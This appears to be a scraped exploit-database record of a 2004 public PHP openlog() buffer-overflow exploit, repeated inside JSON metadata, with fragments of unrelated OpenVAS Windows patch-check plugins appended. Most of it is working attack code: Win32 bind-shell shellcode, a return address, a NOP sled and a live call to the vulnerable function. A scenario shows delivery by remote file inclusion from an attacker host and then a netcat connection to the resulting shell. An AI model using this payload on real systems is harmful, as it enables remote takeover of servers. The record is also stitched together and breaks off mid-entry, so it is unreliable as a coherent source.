ID 1337DAY-ID-8493 Type zdt Reporter The Warlock [BhQ] Modified 2004-12-28T00:00:00
Description
Exploit for unknown platform in category remote exploits
==============================================
PHP <= 4.3.7 openlog() Buffer Overflow Exploit
==============================================
<?
#######################################################################
############################# PUBLIC EXPLOIT #########################
#######################################################################
## PHP v4.3.x exploit by The Warlock [BhQ], http://go.to/biohazardhq ##
################### mail:[email protected] ##################
######################################################################
############################ PUBLIC EXPLOIT ##########################
#######################################################################
/* This "Proof of Concept" sploit is only for Win2k SP4 + PHP 4.3.5 on Apache
2.0.49*
Sploit tested with Apache 2.0.49 + PHP 4.3.5 on a Win2K SP4.
bugtraq says local exploit.
This bug was reported a long time ago for v4.3.1;
bugs.php.net has no status entry referring to this bug, although it was
reported.
The bug is still alive in v4.3.5 and probably newer versions as well,
CHANGELOG of versions to 4.3.7 does not mention the bugfix of openlog();
scenario :
--->
http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt
BOOM....
netcat www.vulnerable.box 65535
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>
--->
Getting a shell is better than parsing commands to the weblog.
[email protected] wrote on bugtraq :
>* Buffer overflow in openlog()
>
>I've tried passing long parameters (and large integers) to openlog(). No
>crashes could be caused by this "exploit". I was unable to demonstrate any
>disruption to PHP via this "vulnerability", let alone complete control.
>Unless the vendor or the original reporter will confirm this with code
>(which was, oddly enough, MISSING from the original advisory), I don't
>believe this "flaw" (if it exists) can do any damage to a default
>production system.
*/
#######################################################################
########################### PUBLIC EXPLOIT ###########################
#######################################################################
// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].
// The payload is treated as one opaque byte string: 24 literals of 16 bytes
// plus a final one of 15 bytes = 399 bytes, matching the size claimed above.
// Nothing below depends on its contents, only on its length.
$gift = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x02\x03";
$gift .= "\x02\x02\x83\xeb\xfc\xe2\xf4\xea\x55\x02\x02\x02\x50\x57\x54\x55";
$gift .= "\x88\x6e\x26\x1a\x88\x47\x3e\x89\x57\x07\x7a\x03\xe9\x89\x48\x1a";
$gift .= "\x88\x58\x22\x03\xe8\xe1\x30\x4b\x88\x36\x89\x03\xed\x33\xfd\xfe";
$gift .= "\x32\xc2\xae\x3a\xe3\x76\x05\xc3\xcc\x0f\x03\xc5\xe8\xf0\x39\x7e";
$gift .= "\x27\x16\x77\xe3\x88\x58\x26\x03\xe8\x64\x89\x0e\x48\x89\x58\x1e";
$gift .= "\x02\xe9\x89\x06\x88\x03\xea\xe9\x01\x33\xc2\x5d\x5d\x5f\x59\xc0";
$gift .= "\x0b\x02\x5c\x68\x33\x5b\x66\x89\x1a\x89\x59\x0e\x88\x59\x1e\x89";
$gift .= "\x18\x89\x59\x0a\x50\x6a\x8c\x4c\x0d\xee\xfd\xd4\x8a\xc5\x83\xee";
$gift .= "\x03\x03\x02\x02\x54\x54\x51\x8b\xe6\xea\x25\x02\x03\x02\x92\x03";
$gift .= "\x03\x02\xb4\x1b\x1b\xe5\xa6\x1b\x73\xeb\xe7\x4b\x85\x4b\xa6\x18";
$gift .= "\x73\xc5\xa6\xaf\x2d\xeb\xdb\x0b\xf6\xaf\xc9\xef\xff\x39\x55\x51";
$gift .= "\x31\x5d\x31\x30\x03\x59\x8f\x49\x23\x53\xfd\xd5\x8a\xdd\x8b\xc1";
$gift .= "\x8e\x77\x16\x68\x04\x5b\x53\x51\xfc\x36\x8d\xfd\x56\x06\x5b\x8b";
$gift .= "\x07\x8c\xe0\xf0\x28\x25\x56\xfd\x34\xfd\x57\x32\x32\xc2\x52\x52";
$gift .= "\x53\x52\x42\x52\x43\x52\xfd\x57\x2f\x8b\xc5\x33\xd8\x51\x51\x6a";
$gift .= "\x01\x02\xfd\xfd\x8a\xe2\x68\x12\x53\x55\xfd\x57\x27\x51\x55\xfd";
$gift .= "\x56\x2a\x51\x56\x54\xfd\x57\x22\x8a\xc5\x6a\x41\x4e\x46\x02\x8b";
$gift .= "\xe0\x85\xf8\x33\xc3\x8f\x7e\x26\xaf\x68\x17\x5b\xf0\xa9\x85\xf8";
$gift .= "\x80\xee\x56\xc4\x47\x26\x12\x46\x65\xc5\x46\x26\x3f\x03\x03\x8b";
$gift .= "\x7f\x26\x4a\x8b\x7f\x26\x4e\x8b\x7f\x26\x52\x8f\x47\x26\x12\x56";
$gift .= "\x53\x53\x53\x53\x42\x53\x4b\x53\x52\x51\x53\xfd\x76\x02\x6a\x70";
$gift .= "\xfd\xb1\x14\xfd\x56\x06\xfd\xd2\x8a\xe4\xfd\x77\x03\x6a\xaf\xdb";
$gift .= "\x06\xcc\xfd\x57\x07\x8b\xc1\x68\xfc\xfd\x34\xfd\xd0\xfd\x77\x02";
$gift .= "\x6b\x7c\xda\xe0\x70\xfd\x57\x06\x32\xd9\x51\xfd\xd3\x02\x02";
// Four hard-coded bytes placed between the two filler runs. Presumably a
// little-endian address specific to the single tested image named in the
// header (Win2k SP4 + Apache 2.0.49 + PHP 4.3.5) -- not verified here. On any
// other build the most likely outcome is a process crash rather than control.
$ret = "\xb8\x9e\xe3\x77";
// 1024 bytes of 0x90 (x86 NOP); reused twice in the layout below.
$nop =str_repeat("\x90", 1024);
// Layout: filler . $ret . filler . payload = 1024 + 4 + 1024 + 399 = 2451 bytes.
$boomstring = $nop . $ret . $nop . $gift;
// The oversized string goes in as the syslog "ident" argument; the overflow
// this relies on is in the PHP 4.3.x openlog() implementation described in the
// header (fix status up to 4.3.7 stated as unknown there). Detection note: an
// ident of several kilobytes of 0x90 bytes is an obvious anomaly in syslog and
// web-server logs; the delivery path sketched in the header is a remote
// include via a URL in a `page=` parameter, which is closed by not allowing
// include() of remote URLs and by running a patched PHP.
openlog($boomstring, LOG_PID, LOG_DAEMON);
// NOTE: the call above is live, so the overflow is triggered as soon as this
// file is included; the remark below is stale.
// uncomment openlog(); to enable exploit... - str0ke did it already for ya.
?>
# 0day.today [2018-03-13] #
{"published": "2004-12-28T00:00:00", "id": "1337DAY-ID-8493", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:01:02", "bulletin": {"published": "2004-12-28T00:00:00", "id": "1337DAY-ID-8493", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 7.2, "modified": "2016-04-20T02:01:02"}}, "hash": "276345a84bba63752a9d473902734797a81eff9c0bce746359fdc6bda1fd17d6", "description": "Exploit for unknown platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-20T02:01:02", "edition": 1, "title": "PHP <= 4.3.7 openlog() Buffer Overflow Exploit", "href": "http://0day.today/exploit/description/8493", "modified": "2004-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/8493", "references": [], "reporter": "The Warlock [BhQ]", "sourceData": "==============================================\r\nPHP <= 4.3.7 openlog() Buffer Overflow Exploit\r\n==============================================\r\n\r\n<?\r\n#######################################################################\r\n############################# PUBLIC EXPLOIT #########################\r\n#######################################################################\r\n\r\n## PHP v4.3.x exploit by The Warlock [BhQ], http://go.to/biohazardhq ##\r\n################### mail:biohazardhq@yahoo.com ##################\r\n######################################################################\r\n############################ PUBLIC EXPLOIT ##########################\r\n#######################################################################\r\n/* This \"Proof of Concept\" sploit is only for Win2k SP4 + PHP 4.3.5 on Apache\r\n2.0.49*\r\n\r\nSploit tested with Apache 2.0.49 + PHP 4.3.5 on a Win2K SP4.\r\nbugtraq says local exploit.\r\nThis bug is reported a long long time ago for v4.3.1\r\nbugs.php.net does not 
have any status that refers to this bug while\r\nreported.\r\nThe bug is still alive in v4.3.5 and probably newer versions as well,\r\nCHANGELOG of versions to 4.3.7 does not mention the bugfix of openlog();\r\n\r\nscenario :\r\n--->\r\nhttp://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt\r\nBOOM....\r\nnetcat www.vulnerable.box 65535\r\nMicrosoft Windows 2000 [versie 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Program Files\\Apache Group\\Apache2>\r\n--->\r\n\r\nGetting a shell is better then parsing commands to the weblog.\r\n\r\nmattmurphy@kc.rr.com wrote on bugtraq :\r\n>* Buffer overflow in openlog()\r\n>\r\n>I've tried passing long parameters (and large integers) to openlog(). No\r\n>crashes could be caused by this \"exploit\". I was unable to demonstrate any\r\n>disruption to PHP via this \"vulnerability\", let alone complete control.\r\n>Unless the vendor or the original reporter will confirm this with code\r\n>(which was, oddly enough, MISSING from the original advisory), I don't\r\n>believe this \"flaw\" (if it exists) can do any damage to a default\r\n>production system.\r\n*/\r\n\r\n#######################################################################\r\n########################### PUBLIC EXPLOIT ###########################\r\n#######################################################################\r\n\r\n// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].\r\n$gift = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x02\\x03\";\r\n$gift .= \"\\x02\\x02\\x83\\xeb\\xfc\\xe2\\xf4\\xea\\x55\\x02\\x02\\x02\\x50\\x57\\x54\\x55\";\r\n$gift .= \"\\x88\\x6e\\x26\\x1a\\x88\\x47\\x3e\\x89\\x57\\x07\\x7a\\x03\\xe9\\x89\\x48\\x1a\";\r\n$gift .= \"\\x88\\x58\\x22\\x03\\xe8\\xe1\\x30\\x4b\\x88\\x36\\x89\\x03\\xed\\x33\\xfd\\xfe\";\r\n$gift .= \"\\x32\\xc2\\xae\\x3a\\xe3\\x76\\x05\\xc3\\xcc\\x0f\\x03\\xc5\\xe8\\xf0\\x39\\x7e\";\r\n$gift .= 
\"\\x27\\x16\\x77\\xe3\\x88\\x58\\x26\\x03\\xe8\\x64\\x89\\x0e\\x48\\x89\\x58\\x1e\";\r\n$gift .= \"\\x02\\xe9\\x89\\x06\\x88\\x03\\xea\\xe9\\x01\\x33\\xc2\\x5d\\x5d\\x5f\\x59\\xc0\";\r\n$gift .= \"\\x0b\\x02\\x5c\\x68\\x33\\x5b\\x66\\x89\\x1a\\x89\\x59\\x0e\\x88\\x59\\x1e\\x89\";\r\n$gift .= \"\\x18\\x89\\x59\\x0a\\x50\\x6a\\x8c\\x4c\\x0d\\xee\\xfd\\xd4\\x8a\\xc5\\x83\\xee\";\r\n$gift .= \"\\x03\\x03\\x02\\x02\\x54\\x54\\x51\\x8b\\xe6\\xea\\x25\\x02\\x03\\x02\\x92\\x03\";\r\n$gift .= \"\\x03\\x02\\xb4\\x1b\\x1b\\xe5\\xa6\\x1b\\x73\\xeb\\xe7\\x4b\\x85\\x4b\\xa6\\x18\";\r\n$gift .= \"\\x73\\xc5\\xa6\\xaf\\x2d\\xeb\\xdb\\x0b\\xf6\\xaf\\xc9\\xef\\xff\\x39\\x55\\x51\";\r\n$gift .= \"\\x31\\x5d\\x31\\x30\\x03\\x59\\x8f\\x49\\x23\\x53\\xfd\\xd5\\x8a\\xdd\\x8b\\xc1\";\r\n$gift .= \"\\x8e\\x77\\x16\\x68\\x04\\x5b\\x53\\x51\\xfc\\x36\\x8d\\xfd\\x56\\x06\\x5b\\x8b\";\r\n$gift .= \"\\x07\\x8c\\xe0\\xf0\\x28\\x25\\x56\\xfd\\x34\\xfd\\x57\\x32\\x32\\xc2\\x52\\x52\";\r\n$gift .= \"\\x53\\x52\\x42\\x52\\x43\\x52\\xfd\\x57\\x2f\\x8b\\xc5\\x33\\xd8\\x51\\x51\\x6a\";\r\n$gift .= \"\\x01\\x02\\xfd\\xfd\\x8a\\xe2\\x68\\x12\\x53\\x55\\xfd\\x57\\x27\\x51\\x55\\xfd\";\r\n$gift .= \"\\x56\\x2a\\x51\\x56\\x54\\xfd\\x57\\x22\\x8a\\xc5\\x6a\\x41\\x4e\\x46\\x02\\x8b\";\r\n$gift .= \"\\xe0\\x85\\xf8\\x33\\xc3\\x8f\\x7e\\x26\\xaf\\x68\\x17\\x5b\\xf0\\xa9\\x85\\xf8\";\r\n$gift .= \"\\x80\\xee\\x56\\xc4\\x47\\x26\\x12\\x46\\x65\\xc5\\x46\\x26\\x3f\\x03\\x03\\x8b\";\r\n$gift .= \"\\x7f\\x26\\x4a\\x8b\\x7f\\x26\\x4e\\x8b\\x7f\\x26\\x52\\x8f\\x47\\x26\\x12\\x56\";\r\n$gift .= \"\\x53\\x53\\x53\\x53\\x42\\x53\\x4b\\x53\\x52\\x51\\x53\\xfd\\x76\\x02\\x6a\\x70\";\r\n$gift .= \"\\xfd\\xb1\\x14\\xfd\\x56\\x06\\xfd\\xd2\\x8a\\xe4\\xfd\\x77\\x03\\x6a\\xaf\\xdb\";\r\n$gift .= \"\\x06\\xcc\\xfd\\x57\\x07\\x8b\\xc1\\x68\\xfc\\xfd\\x34\\xfd\\xd0\\xfd\\x77\\x02\";\r\n$gift .= \"\\x6b\\x7c\\xda\\xe0\\x70\\xfd\\x57\\x06\\x32\\xd9\\x51\\xfd\\xd3\\x02\\x02\";\r\n\r\n\r\n$ret = \"\\xb8\\x9e\\xe3\\x77\";\r\n$nop 
=str_repeat(\"\\x90\", 1024);\r\n$boomstring = $nop . $ret . $nop . $gift;\r\nopenlog($boomstring, LOG_PID, LOG_DAEMON);\r\n// uncomment openlog(); to enable exploit... - str0ke did it already for ya.\r\n?>\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c306f6d27c215bda9f130e75bd936bdf", "key": "href"}, {"hash": "b8ae61e3706db503567eb9b8934ee58a", "key": "title"}, {"hash": "b16529c5718d535980f88300bed4cd0d", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "89afc1a8e8f2661de1eb7061d614131a", "key": "published"}, {"hash": "89afc1a8e8f2661de1eb7061d614131a", "key": "modified"}, {"hash": "bccc02971962dcd486de67718c46fb30", "key": "sourceHref"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a6d0ad99ef614c5f55bc8ea8ccd0d9f9", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category remote exploits", "hash": "e3c8ca80ed0389eb1564ce752d8ee0fc9970bdb9862316afe192eb0da92e692c", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-03-13T16:14:11"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310814078", "OPENVAS:1361412562310814080", "OPENVAS:1361412562310814081", "OPENVAS:1361412562310814083", "OPENVAS:1361412562310814079", "OPENVAS:1361412562310814082"]}, {"type": "kaspersky", "idList": ["KLA11333"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_OCT_4462918.NASL", "SMB_NT_MS18_OCT_4462922.NASL", "SMB_NT_MS18_OCT_4462926.NASL", "SMB_NT_MS18_OCT_4462917.NASL", "SMB_NT_MS18_OCT_4462937.NASL", "SMB_NT_MS18_OCT_4462919.NASL", "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-30713", 
"1337DAY-ID-30608"]}, {"type": "exploitdb", "idList": ["EDB-ID:45019", "EDB-ID:44913"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148535", "PACKETSTORM:148273"]}], "modified": "2018-03-13T16:14:11"}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-03-13T16:14:11", "edition": 2, "title": "PHP <= 4.3.7 openlog() Buffer Overflow Exploit", "href": "https://0day.today/exploit/description/8493", "modified": "2004-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/8493", "references": [], "reporter": "The Warlock [BhQ]", "sourceData": "==============================================\r\nPHP <= 4.3.7 openlog() Buffer Overflow Exploit\r\n==============================================\r\n\r\n<?\r\n#######################################################################\r\n############################# PUBLIC EXPLOIT #########################\r\n#######################################################################\r\n\r\n## PHP v4.3.x exploit by The Warlock [BhQ], http://go.to/biohazardhq ##\r\n################### mail:[email\u00a0protected] ##################\r\n######################################################################\r\n############################ PUBLIC EXPLOIT ##########################\r\n#######################################################################\r\n/* This \"Proof of Concept\" sploit is only for Win2k SP4 + PHP 4.3.5 on Apache\r\n2.0.49*\r\n\r\nSploit tested with Apache 2.0.49 + PHP 4.3.5 on a Win2K SP4.\r\nbugtraq says local exploit.\r\nThis bug is reported a long long time ago for v4.3.1\r\nbugs.php.net does not have any status that refers to this bug while\r\nreported.\r\nThe bug is still alive in v4.3.5 and probably newer versions as well,\r\nCHANGELOG of versions to 4.3.7 does not mention the bugfix of openlog();\r\n\r\nscenario :\r\n--->\r\nhttp://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt\r\nBOOM....\r\nnetcat 
www.vulnerable.box 65535\r\nMicrosoft Windows 2000 [versie 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Program Files\\Apache Group\\Apache2>\r\n--->\r\n\r\nGetting a shell is better then parsing commands to the weblog.\r\n\r\n[email\u00a0protected] wrote on bugtraq :\r\n>* Buffer overflow in openlog()\r\n>\r\n>I've tried passing long parameters (and large integers) to openlog(). No\r\n>crashes could be caused by this \"exploit\". I was unable to demonstrate any\r\n>disruption to PHP via this \"vulnerability\", let alone complete control.\r\n>Unless the vendor or the original reporter will confirm this with code\r\n>(which was, oddly enough, MISSING from the original advisory), I don't\r\n>believe this \"flaw\" (if it exists) can do any damage to a default\r\n>production system.\r\n*/\r\n\r\n#######################################################################\r\n########################### PUBLIC EXPLOIT ###########################\r\n#######################################################################\r\n\r\n// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].\r\n$gift = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x02\\x03\";\r\n$gift .= \"\\x02\\x02\\x83\\xeb\\xfc\\xe2\\xf4\\xea\\x55\\x02\\x02\\x02\\x50\\x57\\x54\\x55\";\r\n$gift .= \"\\x88\\x6e\\x26\\x1a\\x88\\x47\\x3e\\x89\\x57\\x07\\x7a\\x03\\xe9\\x89\\x48\\x1a\";\r\n$gift .= \"\\x88\\x58\\x22\\x03\\xe8\\xe1\\x30\\x4b\\x88\\x36\\x89\\x03\\xed\\x33\\xfd\\xfe\";\r\n$gift .= \"\\x32\\xc2\\xae\\x3a\\xe3\\x76\\x05\\xc3\\xcc\\x0f\\x03\\xc5\\xe8\\xf0\\x39\\x7e\";\r\n$gift .= \"\\x27\\x16\\x77\\xe3\\x88\\x58\\x26\\x03\\xe8\\x64\\x89\\x0e\\x48\\x89\\x58\\x1e\";\r\n$gift .= \"\\x02\\xe9\\x89\\x06\\x88\\x03\\xea\\xe9\\x01\\x33\\xc2\\x5d\\x5d\\x5f\\x59\\xc0\";\r\n$gift .= \"\\x0b\\x02\\x5c\\x68\\x33\\x5b\\x66\\x89\\x1a\\x89\\x59\\x0e\\x88\\x59\\x1e\\x89\";\r\n$gift .= 
\"\\x18\\x89\\x59\\x0a\\x50\\x6a\\x8c\\x4c\\x0d\\xee\\xfd\\xd4\\x8a\\xc5\\x83\\xee\";\r\n$gift .= \"\\x03\\x03\\x02\\x02\\x54\\x54\\x51\\x8b\\xe6\\xea\\x25\\x02\\x03\\x02\\x92\\x03\";\r\n$gift .= \"\\x03\\x02\\xb4\\x1b\\x1b\\xe5\\xa6\\x1b\\x73\\xeb\\xe7\\x4b\\x85\\x4b\\xa6\\x18\";\r\n$gift .= \"\\x73\\xc5\\xa6\\xaf\\x2d\\xeb\\xdb\\x0b\\xf6\\xaf\\xc9\\xef\\xff\\x39\\x55\\x51\";\r\n$gift .= \"\\x31\\x5d\\x31\\x30\\x03\\x59\\x8f\\x49\\x23\\x53\\xfd\\xd5\\x8a\\xdd\\x8b\\xc1\";\r\n$gift .= \"\\x8e\\x77\\x16\\x68\\x04\\x5b\\x53\\x51\\xfc\\x36\\x8d\\xfd\\x56\\x06\\x5b\\x8b\";\r\n$gift .= \"\\x07\\x8c\\xe0\\xf0\\x28\\x25\\x56\\xfd\\x34\\xfd\\x57\\x32\\x32\\xc2\\x52\\x52\";\r\n$gift .= \"\\x53\\x52\\x42\\x52\\x43\\x52\\xfd\\x57\\x2f\\x8b\\xc5\\x33\\xd8\\x51\\x51\\x6a\";\r\n$gift .= \"\\x01\\x02\\xfd\\xfd\\x8a\\xe2\\x68\\x12\\x53\\x55\\xfd\\x57\\x27\\x51\\x55\\xfd\";\r\n$gift .= \"\\x56\\x2a\\x51\\x56\\x54\\xfd\\x57\\x22\\x8a\\xc5\\x6a\\x41\\x4e\\x46\\x02\\x8b\";\r\n$gift .= \"\\xe0\\x85\\xf8\\x33\\xc3\\x8f\\x7e\\x26\\xaf\\x68\\x17\\x5b\\xf0\\xa9\\x85\\xf8\";\r\n$gift .= \"\\x80\\xee\\x56\\xc4\\x47\\x26\\x12\\x46\\x65\\xc5\\x46\\x26\\x3f\\x03\\x03\\x8b\";\r\n$gift .= \"\\x7f\\x26\\x4a\\x8b\\x7f\\x26\\x4e\\x8b\\x7f\\x26\\x52\\x8f\\x47\\x26\\x12\\x56\";\r\n$gift .= \"\\x53\\x53\\x53\\x53\\x42\\x53\\x4b\\x53\\x52\\x51\\x53\\xfd\\x76\\x02\\x6a\\x70\";\r\n$gift .= \"\\xfd\\xb1\\x14\\xfd\\x56\\x06\\xfd\\xd2\\x8a\\xe4\\xfd\\x77\\x03\\x6a\\xaf\\xdb\";\r\n$gift .= \"\\x06\\xcc\\xfd\\x57\\x07\\x8b\\xc1\\x68\\xfc\\xfd\\x34\\xfd\\xd0\\xfd\\x77\\x02\";\r\n$gift .= \"\\x6b\\x7c\\xda\\xe0\\x70\\xfd\\x57\\x06\\x32\\xd9\\x51\\xfd\\xd3\\x02\\x02\";\r\n\r\n\r\n$ret = \"\\xb8\\x9e\\xe3\\x77\";\r\n$nop =str_repeat(\"\\x90\", 1024);\r\n$boomstring = $nop . $ret . $nop . $gift;\r\nopenlog($boomstring, LOG_PID, LOG_DAEMON);\r\n// uncomment openlog(); to enable exploit... 
- str0ke did it already for ya.\r\n?>\r\n\r\n\n# 0day.today [2018-03-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "04aee93e8b116d991b662560479bc481", "key": "href"}, {"hash": "89afc1a8e8f2661de1eb7061d614131a", "key": "modified"}, {"hash": "89afc1a8e8f2661de1eb7061d614131a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a6d0ad99ef614c5f55bc8ea8ccd0d9f9", "key": "reporter"}, {"hash": "5a135917db610b1bb23be33e82ff1133", "key": "sourceData"}, {"hash": "e8f8e6292898ede0da93554160f4eae1", "key": "sourceHref"}, {"hash": "b8ae61e3706db503567eb9b8934ee58a", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"openvas": [{"lastseen": "2019-05-29T18:33:13", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462922", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814078", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814078", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462922)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462922)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814078\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8503\", \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\",\n \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\",\n \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\",\n \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8490\", \"CVE-2018-8491\",\n \"CVE-2018-8493\", \"CVE-2018-8494\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 08:49:30 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462922)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462922\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - Windows Media Player improperly 
discloses file information.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, gain the same user rights as the current user, obtain\n information to further compromise the user's system, improperly discloses file\n information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 for 32-bit Systems\n\n Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462922\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", 
test_version2:\"11.0.10240.18004\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.18004\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:15", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462926", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814083", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814083", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462926)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462926)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 